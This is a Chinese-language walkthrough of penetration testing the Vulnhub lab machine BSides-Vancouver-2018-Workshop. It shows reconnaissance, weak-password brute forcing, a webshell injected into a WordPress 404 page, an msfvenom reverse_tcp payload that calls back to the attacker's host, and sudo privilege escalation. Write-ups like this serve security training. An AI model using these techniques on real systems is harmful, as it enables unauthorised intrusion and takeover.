靶机渗透测试(BSides):
Vulnhub靶机 BSides-Vancouver-2018-Workshop
靶机:修改靶机的网络配置为桥接模式。
攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机。
靶机难度:(初级)
目标:成功渗透进入靶机,找到flag.txt,提权到root权限。
渗透流程:
1.探测主机ip:(netdiscover -i eth0 -r 网关)
2.nmap扫描目标主机端口服务:
目标主机开启了21-ftp,22-ssh,80-http等服务端口;
3.web渗透(80端口)
3.1 进行web目录扫描,dirb ,御剑工具等等;
3.2 探测出含有robots.txt目录,在/robots.txt中发现一个反爬虫目录/backup_wordpress;
3.3 在/backup_wordpresst中发现一个登陆目录/wp-login;
4.ftp-21端口服务
4.1 ftp://靶机ip
4.2 访问后,发现存在目录遍历漏洞
发现了一个users.txt.bk,里面存储着用户名
4.3 根据ftp服务得到的用户名进行用户名枚举,弱口令爆破得到web页面
用户名密码:john(enigma);
4.4 登陆后制作监听文件(在404页面注入监听木马),开启nc监听在index.php页面写入大马,访问index.php,然后菜刀连接,成功获取shell;
将获得的shell 提升至root 权限
访问/usr/local/bin/cleanup
发现权限很高,可以执行读写;
4.5 也可以使用msf生成木马:
Msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPROT=端口 -f raw > shell.txt
-p 选择payload
-e 选择使用的编码
-i 给payload编码的次数
-b 避免出现的字符
-f 输出文件类型
-o 输出文件目录
将木马上传后,msf设置监听;然后通过输入任意不存在的页面,可触发上传的代码,反弹shell到msf上;最后进行提权操作;
5.ssh-22端口:
5.1 根据ftp服务得到的用户名进行用户名枚举,弱口令爆破得到ssh连接的用户名密码:anne(princess);
5.2 ssh连接:
5.3 sudo提权:
whoami>发现此时用户为anne,并非root权限
pwd>查看/home/anne
groups>anne sudo
unmae -a
用户anne属于sudo组,可直接进行提权
sudo -i
whoami
root